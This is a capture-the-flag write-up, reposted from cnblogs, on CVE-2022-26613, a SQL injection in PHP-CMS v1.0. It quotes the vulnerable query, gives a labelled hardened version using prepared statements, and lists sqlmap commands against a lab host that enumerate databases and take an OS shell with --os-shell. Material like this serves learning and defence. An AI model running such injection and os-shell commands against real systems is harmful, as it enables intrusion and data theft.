[Vulnerability Reproduction] PHP-CMS v1.0 SQL Injection Vulnerability (CVE-2022-26613)
0x01 Vulnerability Description
Chunqiu Cloud Mirror range: PHP-CMS v1.0 contains a SQL injection vulnerability through which an attacker can obtain sensitive information.
CVE:PHP-CMS v1.0 was discovered to contain a SQL injection vulnerability via the category parameter in categorymenu.php.
0x02 Affected Versions
PHP-CMS v1.0 (affected endpoints listed below)
http://pwned_host.com/PHP-CMS-master/categorymenu.php
http://pwned_host.com/PHP-CMS-master/forgot.php
http://pwned_host.com/PHP-CMS-master/post.php
http://pwned_host.com/PHP-CMS-master/search.php
0x03 Vulnerability Analysis
The user can control the category parameter through the GET method without any filtering.
Source code (the vulnerable query in categorymenu.php, as shipped):
<?php
    if(isset($_GET['category'])){
        // user-controlled value taken straight from the query string
        $post_category_id = $_GET['category'];
    }
    // the value is interpolated directly into the SQL text: no cast, no escaping, no binding
    $query = "SELECT * FROM posts WHERE post_category_id = {$post_category_id} ";
    $select_all_posts_count_query = mysqli_query($connection,$query);
    $count = mysqli_num_rows($select_all_posts_count_query);
    confirm_query($select_all_posts_count_query);
    // ……
    while($row = mysqli_fetch_assoc($select_all_posts_count_query)){
        $post_id = $row['post_id'];
        $post_title = $row['post_title'];
        $post_user = $row['post_user'];
        $post_date = $row['post_date'];
        $post_image = $row['post_image'];
        $post_content = $row['post_content'];
?>
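For comparison, here is a hardened replacement for the same query. This is an added example written for this page, not code from the PHP-CMS project or from the original post. It assumes $connection is an open mysqli handle, that the mysqlnd driver is available (needed for get_result()), and that posts.post_category_id is an integer column, which is what the original query implies. The fix has two layers: the parameter is validated as a positive integer before use, and the value reaches MySQL only as a bound parameter, never as part of the SQL string.

```php
<?php
// Added example, not PHP-CMS project code: hardened version of the
// categorymenu.php query. Assumes $connection is an open mysqli handle
// and that posts.post_category_id is an integer column.
declare(strict_types=1);

// Make mysqli throw on errors instead of returning false silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Validate the category id taken from the query string.
 * Returns null when the parameter is absent or not a positive integer,
 * so inputs such as "1'", "1 OR 1=1" or "1 UNION ..." never reach the DB layer.
 */
function read_category_id(array $get): ?int
{
    if (!isset($get['category'])) {
        return null;
    }
    $id = filter_var($get['category'], FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    return $id === false ? null : $id;
}

/**
 * Fetch posts for one category with a prepared statement. The '?' placeholder
 * is bound as an integer ('i'), so the value is sent separately from the
 * query text and cannot change the statement's structure.
 */
function fetch_posts_by_category(mysqli $connection, int $category_id): array
{
    $stmt = $connection->prepare(
        'SELECT post_id, post_title, post_user, post_date, post_image, post_content
           FROM posts
          WHERE post_category_id = ?'
    );
    $stmt->bind_param('i', $category_id);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

$category_id = read_category_id($_GET);
if ($category_id === null) {
    // Reject malformed input explicitly rather than letting PHP coerce it.
    http_response_code(400);
    exit('Invalid category');
}

$posts = fetch_posts_by_category($connection, $category_id);
$count = count($posts);

foreach ($posts as $row) {
    // Encode on output as well: the original loop echoes column values into HTML.
    $post_id      = (int) $row['post_id'];
    $post_title   = htmlspecialchars($row['post_title'], ENT_QUOTES, 'UTF-8');
    $post_user    = htmlspecialchars($row['post_user'], ENT_QUOTES, 'UTF-8');
    $post_date    = htmlspecialchars($row['post_date'], ENT_QUOTES, 'UTF-8');
    $post_image   = htmlspecialchars($row['post_image'], ENT_QUOTES, 'UTF-8');
    $post_content = htmlspecialchars($row['post_content'], ENT_QUOTES, 'UTF-8');
    // ... render the post as before
}
```

The same pattern (validate, then bind) applies to the other endpoints listed in section 0x02 (forgot.php, post.php, search.php); for free-text fields such as a search term, keep the prepared statement but bind with 's' instead of 'i' and skip the integer check. Selecting the needed columns explicitly instead of SELECT * also limits what a successful injection elsewhere could disclose.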
Detailed reference: https://github.com/harshitbansal373/PHP-CMS/issues/14
0x04 Vulnerability Reproduction
Enter the range; the interface is as follows:
Click the #home tag under Categories at the bottom right of the page to go to the categorymenu.php?category=1 page; a single-quote test confirms the injection point.
Use sqlmap to enumerate the database names:
sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 --dbs
No obvious flag hint was found, so continue testing the mysql and cms databases:
sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 -D mysql --tables
sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 -D cms --tables
Guessing that the flag may not be in the database, use --os-shell to look for /flag directly in the root directory:
sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 --os-shell
The flag is found.
This article is from cnblogs, author: 0dot7. Please credit the original link when reposting: https://www.cnblogs.com/0dot7/p/17229519.html
If there are any errors in this article, corrections from fellow practitioners are welcome!
Disclaimer: Do not use the techniques described in this article for illegal testing. Any direct or indirect consequences and losses resulting from the dissemination or use of the information provided in this article are the sole responsibility of the user; the author bears no responsibility for them.